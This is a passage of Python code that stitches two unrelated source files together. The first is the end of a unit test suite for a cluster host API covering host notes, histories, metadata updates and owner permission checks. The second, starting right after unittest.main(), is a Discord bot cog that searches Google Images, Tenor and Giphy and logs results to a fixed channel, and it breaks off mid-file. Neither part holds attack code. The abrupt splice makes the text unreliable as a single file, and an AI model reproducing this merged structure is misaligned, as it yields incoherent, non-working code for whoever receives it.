self.assertEqual(note_msgs[1].user, note_entities[1].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[1].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[1].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[1].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[1].recovery_action)
# fetch previous page (same as first page)
api_request = {
'hostname': 'host_1',
'count': 2,
'cursor': host_note_collection_msg.prev_cursor,
'backwards': True,
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListNotes',
api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[3].hostname)
self.assertEqual(note_msgs[0].user, note_entities[3].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[3].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[3].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[3].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[3].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[2].hostname)
self.assertEqual(note_msgs[1].user, note_entities[2].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[2].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[2].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[2].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[2].recovery_action)
def testBatchGetHostNotes(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
hostname='host_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
keys = ndb.put_multi(note_entities)
# The result will be sorted by timestamp in descending order.
api_request = {
'hostname': 'host_1',
'ids': [keys[0].id(), keys[1].id(), keys[3].id()],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchGetNotes', api_request)
host_note_collection_msg = protojson.decode_message(
api_messages.NoteCollection, api_response.body)
note_msgs = host_note_collection_msg.notes
self.assertEqual(2, len(note_msgs))
self.assertEqual(note_msgs[0].hostname, note_entities[0].hostname)
self.assertEqual(note_msgs[0].user, note_entities[0].user)
self.assertEqual(note_msgs[0].timestamp,
note_entities[0].timestamp)
self.assertEqual(note_msgs[0].message, note_entities[0].message)
self.assertEqual(note_msgs[0].offline_reason,
note_entities[0].offline_reason)
self.assertEqual(note_msgs[0].recovery_action,
note_entities[0].recovery_action)
self.assertEqual(note_msgs[1].hostname, note_entities[1].hostname)
self.assertEqual(note_msgs[1].user, note_entities[1].user)
self.assertEqual(note_msgs[1].timestamp,
note_entities[1].timestamp)
self.assertEqual(note_msgs[1].message, note_entities[1].message)
self.assertEqual(note_msgs[1].offline_reason,
note_entities[1].offline_reason)
self.assertEqual(note_msgs[1].recovery_action,
note_entities[1].recovery_action)
def testDeleteHostNotes(self):
note_entities = [
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user1',
timestamp=datetime.datetime(1928, 1, 1),
message='message_1',
offline_reason='offline_reason_1',
recovery_action='recovery_action_1'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user2',
timestamp=datetime.datetime(1918, 1, 1),
message='message_2',
offline_reason='offline_reason_2',
recovery_action='recovery_action_2'),
datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_1',
user='user3',
timestamp=datetime.datetime(1988, 1, 1),
message='message_3',
offline_reason='offline_reason_3',
recovery_action='recovery_action_3'),
datastore_entities.Note(
hostname='host_2',
user='user4',
timestamp=datetime.datetime(2008, 1, 1),
message='message_4',
offline_reason='offline_reason_4',
recovery_action='recovery_action_4'),
]
keys = ndb.put_multi(note_entities)
# When an ID does not match the hostname, none of the notes will be deleted.
api_request = {
'hostname': 'host_2',
'ids': [keys[0].id(), keys[1].id(), keys[3].id(), 100],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchDeleteNotes', api_request,
expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
self.assertLen(list(filter(None, ndb.get_multi(keys))), len(keys))
# When all IDs match exactly, all requested notes are deleted.
api_request = {
'hostname': 'host_1',
'ids': [keys[0].id(), keys[2].id()],
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchDeleteNotes', api_request)
self.assertEqual('200 OK', api_response.status)
self.assertCountEqual([note_entities[1].key.id(),
note_entities[3].key.id()],
[entity.key.id() for entity in ndb.get_multi(keys)
if entity])
def testAssign(self):
"""Tests Assign."""
api_request = {
'hostnames': [self.ndb_host_0.hostname, self.ndb_host_1.hostname],
'assignee': 'assignee@example.com',
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Assign',
api_request)
self.assertEqual('200 OK', api_response.status)
self.ndb_host_0 = self.ndb_host_0.key.get()
self.assertEqual('assignee@example.com', self.ndb_host_0.assignee)
self.ndb_host_1 = self.ndb_host_1.key.get()
self.assertEqual('assignee@example.com', self.ndb_host_1.assignee)
def testUnassign(self):
"""Tests Unassign."""
self.ndb_host_1.assignee = 'assignee@example.com'
self.ndb_host_1.put()
self.ndb_host_2.assignee = 'assignee@example.com'
self.ndb_host_2.put()
api_request = {
'hostnames': [self.ndb_host_0.hostname, self.ndb_host_1.hostname],
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.Unassign',
api_request)
self.assertEqual('200 OK', api_response.status)
self.ndb_host_0 = self.ndb_host_0.key.get()
self.assertIsNone(self.ndb_host_0.assignee)
self.ndb_host_1 = self.ndb_host_1.key.get()
self.assertIsNone(self.ndb_host_1.assignee)
def testListHostHistories(self):
"""Tests ListHistories returns all host histories."""
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.KILLING
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.GONE
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
api_request = {'hostname': self.ndb_host_0.hostname}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(3, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.GONE.name,
host_history_collection.histories[0].host_state)
self.assertEqual(api_messages.HostState.KILLING.name,
host_history_collection.histories[1].host_state)
self.assertEqual(api_messages.HostState.RUNNING.name,
host_history_collection.histories[2].host_state)
def testListHostHistories_withCursorAndOffsetAndBackwards(self):
"""Tests ListHistories returns histories applying a count and offset."""
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.KILLING
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
self.ndb_host_0.host_state = api_messages.HostState.GONE
self.ndb_host_0.timestamp += datetime.timedelta(hours=1)
device_manager._CreateHostInfoHistory(self.ndb_host_0).put()
# fetch first page
api_request = {'hostname': self.ndb_host_0.hostname, 'count': 2}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.GONE.name,
host_history_collection.histories[0].host_state)
self.assertEqual(api_messages.HostState.KILLING.name,
host_history_collection.histories[1].host_state)
# fetch next page
api_request = {
'hostname': self.ndb_host_0.hostname,
'count': 2,
'cursor': host_history_collection.next_cursor
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.RUNNING.name,
host_history_collection.histories[0].host_state)
# fetch previous page (same as first page)
api_request = {
'hostname': self.ndb_host_0.hostname,
'count': 2,
'cursor': host_history_collection.prev_cursor,
'backwards': True
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHistories', api_request)
host_history_collection = protojson.decode_message(
api_messages.HostInfoHistoryCollection, api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_history_collection.histories))
self.assertEqual(api_messages.HostState.GONE.name,
host_history_collection.histories[0].host_state)
self.assertEqual(api_messages.HostState.KILLING.name,
host_history_collection.histories[1].host_state)
def testCheckTimestamp(self):
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.EQUAL,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.EQUAL,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.LESS_THAN,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.LESS_THAN,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.GREATER_THAN,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.GREATER_THAN,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.GREATER_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 30)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.GREATER_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertTrue(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 30),
common.Operator.LESS_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 31)))
self.assertFalse(
cluster_host_api._CheckTimestamp(
datetime.datetime(2020, 8, 8, 17, 31),
common.Operator.LESS_THAN_OR_EQUAL,
datetime.datetime(2020, 8, 8, 17, 30)))
def testBatchSetRecoveryState(self):
"""Tests BatchSetRecoveryState."""
api_request = {
'host_recovery_state_requests': [
{
'hostname': self.ndb_host_0.hostname,
'recovery_state': 'ASSIGNED',
'assignee': 'user1'
},
{
'hostname': self.ndb_host_1.hostname,
'recovery_state': 'FIXED',
'assignee': 'user1'
},
]
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchSetRecoveryState',
api_request)
self.assertEqual('200 OK', api_response.status)
self.ndb_host_0 = self.ndb_host_0.key.get()
self.assertEqual('ASSIGNED', self.ndb_host_0.recovery_state)
self.assertEqual('user1', self.ndb_host_0.assignee)
self.ndb_host_1 = self.ndb_host_1.key.get()
self.assertEqual('user1', self.ndb_host_1.assignee)
self.assertEqual('FIXED', self.ndb_host_1.recovery_state)
def testListHostConfigs(self):
"""Test ListHostConfigs."""
configs = [
datastore_test_util.CreateHostConfig(
'host1', 'lab1', cluster_name='cluster1'),
datastore_test_util.CreateHostConfig(
'host2', 'lab1', cluster_name='cluster2'),
datastore_test_util.CreateHostConfig(
'host3', 'lab2', cluster_name='cluster3'),
]
api_request = {}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHostConfigs',
api_request)
self.assertEqual('200 OK', api_response.status)
host_config_collection = protojson.decode_message(
api_messages.HostConfigCollection, api_response.body)
self.assertLen(host_config_collection.host_configs, 3)
self.assertCountEqual(
[config.hostname for config in configs],
[config.hostname for config in host_config_collection.host_configs])
self.assertCountEqual(
[config.lab_name for config in configs],
[config.lab_name for config in host_config_collection.host_configs])
self.assertCountEqual(
[config.cluster_name for config in configs],
[config.cluster_name for config in host_config_collection.host_configs])
def testListHostConfigs_withLabNameFilter(self):
"""Test ListHostConfigs with lab_name filter."""
datastore_test_util.CreateHostConfig(
'host1', 'lab1', cluster_name='cluster1')
datastore_test_util.CreateHostConfig(
'host2', 'lab1', cluster_name='cluster2')
datastore_test_util.CreateHostConfig(
'host3', 'lab2', cluster_name='cluster3')
api_request = {
'lab_name': 'lab1',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.ListHostConfigs',
api_request)
self.assertEqual('200 OK', api_response.status)
host_config_collection = protojson.decode_message(
api_messages.HostConfigCollection, api_response.body)
self.assertLen(host_config_collection.host_configs, 2)
self.assertCountEqual(
['host1', 'host2'],
[config.hostname for config in host_config_collection.host_configs])
self.assertCountEqual(
['lab1', 'lab1'],
[config.lab_name for config in host_config_collection.host_configs])
self.assertCountEqual(
['cluster1', 'cluster2'],
[config.cluster_name for config in host_config_collection.host_configs])
def testGetHostMetadata(self):
"""Tests GetHostMetadata."""
datastore_test_util.CreateHostMetadata(
'host1', test_harness_image='a_test_harness_image')
api_request = {
'hostname': 'host1',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.GetMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = protojson.decode_message(
api_messages.HostMetadata, api_response.body)
self.assertEqual('host1', host_metadata.hostname)
self.assertEqual('a_test_harness_image', host_metadata.test_harness_image)
def testGetHostMetadata_noHostMetadata(self):
"""Tests GetHostMetadata with no metadata."""
api_request = {
'hostname': 'host1',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.GetMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = protojson.decode_message(
api_messages.HostMetadata, api_response.body)
self.assertEqual('host1', host_metadata.hostname)
self.assertIsNone(host_metadata.test_harness_image)
def testPatchHostMetadata_previouslyNotExist(self):
"""Tests PatchHostMetadata previously not exist."""
api_request = {
'hostname': 'host1',
'test_harness_image': 'image_a',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.PatchMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
metadata_entity = datastore_entities.HostMetadata.get_by_id('host1')
self.assertEqual('image_a', metadata_entity.test_harness_image)
def testPatchHostMetadata_patchExisting(self):
"""Tests PatchHostMetadata previously not exist."""
datastore_test_util.CreateHostMetadata(
'host1', test_harness_image='image_a')
api_request = {
'hostname': 'host1',
'test_harness_image': 'image_b',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.PatchMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
metadata_entity = datastore_entities.HostMetadata.get_by_id('host1')
self.assertEqual('image_b', metadata_entity.test_harness_image)
def testBatchUpdateHostMetadata_succeedsWithNoExistingMetadata(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag = 'new'
image_name_new = ':'.join([repo_name, tag])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname1)
self.assertEqual(hostname1, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname1)
self.assertEqual(hostname1, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname2)
self.assertEqual(hostname2, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname2)
self.assertEqual(hostname2, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
def testBatchUpdateHostMetadata_succeedsWithExistingMetadata(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostMetadata(
hostname=hostname1, test_harness_image=image_name_old)
datastore_test_util.CreateHostMetadata(
hostname=hostname2, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old])
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag_new])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname1)
self.assertEqual(hostname1, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname1)
self.assertEqual(hostname1, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname2)
self.assertEqual(hostname2, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
host_update_state = datastore_entities.HostUpdateState.get_by_id(hostname2)
self.assertEqual(hostname2, host_update_state.hostname)
self.assertEqual(api_messages.HostUpdateState.PENDING,
host_update_state.state)
def testBatchUpdateHostMetadata_succeedsWithUnchangedImage(self):
"""Test batch set test_harness_image for hosts."""
hostname = 'host1'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostMetadata(
hostname=hostname, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old, tag_new])
api_request = {
'hostnames': [hostname],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request)
self.assertEqual('200 OK', api_response.status)
host_metadata = datastore_entities.HostMetadata.get_by_id(hostname)
self.assertEqual(hostname, host_metadata.hostname)
self.assertEqual(image_name_new, host_metadata.test_harness_image)
# No update should start in this case, because the image is not changed.
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname))
def testBatchUpdateHostMetadata_failUserNotPermitted(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=True)
datastore_test_util.CreateHostMetadata(
hostname=hostname1, test_harness_image=image_name_old)
datastore_test_util.CreateHostMetadata(
hostname=hostname2, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old])
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag_new])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': 'wrongperson',
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request, expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
expected_error_msg = (
b'Request user wrongperson is not in the owner list'
b' of hosts [host1, host2]. ')
self.assertIn(expected_error_msg, api_response.body)
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname1))
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname2))
def testBatchUpdateHostMetadata_failHostNotEnabled(self):
"""Test batch set test_harness_image for hosts."""
hostname1 = 'host1'
hostname2 = 'host2'
lab_name = 'alab'
owner = 'user1'
repo_name = 'test_repo'
tag_old = 'old'
tag_new = 'new'
image_name_old = ':'.join([repo_name, tag_old])
image_name_new = ':'.join([repo_name, tag_new])
datastore_test_util.CreateHostConfig(
hostname1, lab_name, owners=[owner], enable_ui_update=False)
datastore_test_util.CreateHostConfig(
hostname2, lab_name, owners=[owner], enable_ui_update=False)
datastore_test_util.CreateHostMetadata(
hostname=hostname1, test_harness_image=image_name_old)
datastore_test_util.CreateHostMetadata(
hostname=hostname2, test_harness_image=image_name_old)
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d1', current_tags=[tag_old])
datastore_test_util.CreateTestHarnessImageMetadata(
repo_name=repo_name, digest='d2', current_tags=[tag_new])
api_request = {
'hostnames': [hostname1, hostname2],
'test_harness_image': image_name_new,
'user': owner,
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request, expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
expected_error_msg = (
b'Hosts [host1, host2] are not enabled to be updated '
b'from UI. ')
self.assertIn(expected_error_msg, api_response.body)
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname1))
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname2))
if __name__ == '__main__':
unittest.main()
import os, discord, time, async_cse, random, cse
from discord.ext import commands
from difflib import SequenceMatcher
from discord.ext.commands.cooldowns import BucketType
import utils
from aiogifs.tenor import TenorClient, ContentFilter
from aiogifs.giphy import GiphyClient, AgeRating
class Order(commands.Cog):
"Commands to get (images or gifs) or search results from very specific apis like tenor, giphy, and google custom search"
def __init__(self, bot):
self.bot = bot
bot.loop.create_task(self.__ainit__())
async def __ainit__(self):
await self.bot.wait_until_ready()
tenor_key = os.environ["tenor_key"]
giphy_key = os.environ["giphy_token"]
image_api_key = os.environ["image_api_key"]
image_engine_key = os.environ["google_image_key"]
self.image_client = async_cse.Search(image_api_key, engine_id = image_engine_key, session = self.bot.session)
        self.tenor_client = TenorClient(api_key = tenor_key, session = self.bot.session)
self.giphy_client = GiphyClient(api_key=giphy_key, session = self.bot.session)
self.google_engine = cse.Search(image_api_key, session = self.bot.session, engine_id = image_engine_key)
@commands.cooldown(1, 30, BucketType.user)
@commands.group(name = "order", invoke_without_command = True, brief = "searches from google images to find the closest google image")
async def order(self, ctx, *, args = None):
if not args:
await ctx.send("You can't order nothing.")
ctx.command.reset_cooldown(ctx)
if args:
time_before = time.perf_counter()
try:
results = await self.image_client.search(args, safesearch = True, image_search = True)
emoji_image = sorted(results, key = lambda x: SequenceMatcher(None, x.image_url, args).ratio())[-1]
except async_cse.search.NoResults:
return await ctx.send("No results found :(")
time_after = time.perf_counter()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title = f"Item: {args}", description=f"{ctx.author} ordered a {args}", color = random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:", icon_url = (ctx.author.display_avatar.url))
embed.add_field(name="Time Spent:", value = f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:", value="Google Images Api")
embed.add_field(name = "Image link:", value = f"[Image Link]({emoji_image.image_url})")
embed.set_image(url = emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@order.command(brief = "a command to shuffle images from google images")
async def shuffle(self, ctx, *, args = None):
if not args:
await self.order(ctx, args="shuffle")
if args:
time_before=time.perf_counter()
try:
results = await self.image_client.search(args, safesearch = True, image_search=True)
except async_cse.search.NoResults:
return await ctx.send("No results found :(")
emoji_image = random.choice(results)
time_after=time.perf_counter()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.display_avatar.url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.add_field(name = "Image link:", value = f"[Image Link]({emoji_image.image_url})")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.bot.get_channel(855217084710912050).send(embed=embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief="a command to shuffle images from google images", aliases=["order-shuffle"])
async def order_shuffle(self, ctx, *, args = None):
if not args:
await ctx.send("You can't order nothing")
ctx.command.reset_cooldown(ctx)
if args:
time_before=time.perf_counter()
try:
results = await self.image_client.search(args, safesearch = True, image_search=True)
except async_cse.search.NoResults:
return await ctx.send("No results found :(")
emoji_image = random.choice(results)
time_after = time.perf_counter()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.display_avatar.url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.add_field(name = "Image link:", value = f"[Image Link]({emoji_image.image_url})")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.bot.get_channel(855217084710912050).send(embed=embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.group(name = "tenor", invoke_without_command = True, brief = "searches from tenor to find the closest image.")
async def tenor(self, ctx, *, args = None):
        if not args:
            ctx.command.reset_cooldown(ctx)
            return await ctx.send("You can't search for nothing")
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search(args, content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = sorted(results_media, key=lambda x: SequenceMatcher(None, x.item_url, args).ratio())[-1]
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color = random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_author(name = f"order for {ctx.author}:", icon_url= ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="Tenor")
if gifNearest.gif: embed.set_image(url= gifNearest.gif.url)
        else: embed.set_image(url="https://i.imgur.com/sLQzAiW.png")
embed.set_footer(text = f"{ctx.author.id}")
await ctx.send(content = "Tenor has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@tenor.command(help = "shuffles the results from the tenor results", name = "shuffle")
async def tenor_random(self, ctx, *, args = None):
if not args:
return await self.tenor(ctx, args="shuffle")
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search(args, content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color = random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_author(name = f"order for {ctx.author}:", icon_url= ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="Tenor")
if gifNearest.gif: embed.set_image(url= gifNearest.gif.url)
        else: embed.set_image(url="https://i.imgur.com/sLQzAiW.png")
embed.set_footer(text = f"{ctx.author.id}")
await ctx.send(content = "Tenor has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
